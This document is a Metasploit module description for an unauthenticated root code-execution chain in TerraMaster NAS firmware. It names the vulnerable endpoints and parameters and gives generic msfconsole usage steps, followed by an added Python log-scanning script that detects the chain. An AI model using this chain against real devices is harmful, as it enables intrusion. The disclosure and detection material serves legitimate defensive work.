This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29
and lower by chaining two existing vulnerabilities: CVE-2022-24990, "Leaking sensitive information",
and CVE-2022-24989, "Authenticated remote code execution".
The vulnerable endpoint `api.php?mobile/webNasIPS` leaks sensitive information such as the admin password
hash and MAC address. With this information the attacker can achieve unauthenticated access and use a second
vulnerable endpoint, `api.php?mobile/createRaid`, with POST parameters `raidtype` and `diskstring`, to execute
remote code as root on TerraMaster NAS devices.

```
msf > use exploit/linux/http/terramaster_unauth_rce_cve_2022_24990
msf exploit(terramaster_unauth_rce_cve_2022_24990) > show targets
    ...targets...
msf exploit(terramaster_unauth_rce_cve_2022_24990) > set TARGET <target-id>
msf exploit(terramaster_unauth_rce_cve_2022_24990) > show options
    ...show and set options...
msf exploit(terramaster_unauth_rce_cve_2022_24990) > exploit
```
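
For detection, both endpoints named in the description show up in the web server access log of the NAS. The following is an added example, not part of the module or the original page: it scans log lines for a client that requests `api.php?mobile/webNasIPS` and then POSTs to `api.php?mobile/createRaid`. The combined log format, the sample lines, and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2022:10:00:01 +0000] "GET /api.php?mobile/webNasIPS HTTP/1.1" 200 512 "-" "-"
192.0.2.10 - - [01/Mar/2022:10:00:03 +0000] "POST /api.php?mobile/createRaid HTTP/1.1" 200 64 "-" "-"
198.51.100.7 - - [01/Mar/2022:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "-"
203.0.113.5 - - [01/Mar/2022:10:06:00 +0000] "GET /api.php?mobile/webNasIPS HTTP/1.1" 200 512 "-" "-"
"""

# client, method, request target, status (assumed combined log format)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
LEAK = "api.php?mobile/webnasips"    # information leak endpoint (CVE-2022-24990)
EXEC = "api.php?mobile/createraid"   # command execution endpoint (CVE-2022-24989)


def classify(method, target):
    """Label one request as 'leak', 'exec' or None."""
    # Decode percent-encoding and ignore case so trivial variations still match.
    t = unquote(target).lower()
    if LEAK in t:
        return "leak"
    if EXEC in t and method.upper() == "POST":
        return "exec"
    return None


def find_chains(log_text):
    """Return {client_ip: finding}, ordered by first appearance in the log."""
    seen_leak, findings = set(), {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, method, target, _status = m.groups()
        kind = classify(method, target)
        if kind == "leak":
            seen_leak.add(ip)
            findings.setdefault(ip, "info-leak probe")
        elif kind == "exec":
            # A createRaid POST after a webNasIPS request from the same client
            # matches the two-step chain; a lone POST is still worth review.
            findings[ip] = "leak + createRaid chain" if ip in seen_leak else "createRaid POST only"
    return findings


if __name__ == "__main__":
    for ip, finding in find_chains(SAMPLE_LOG).items():
        print(f"{ip}: {finding}")
```

Correlation here is by source address, so requests arriving through a reverse proxy or NAT need the forwarded client address instead.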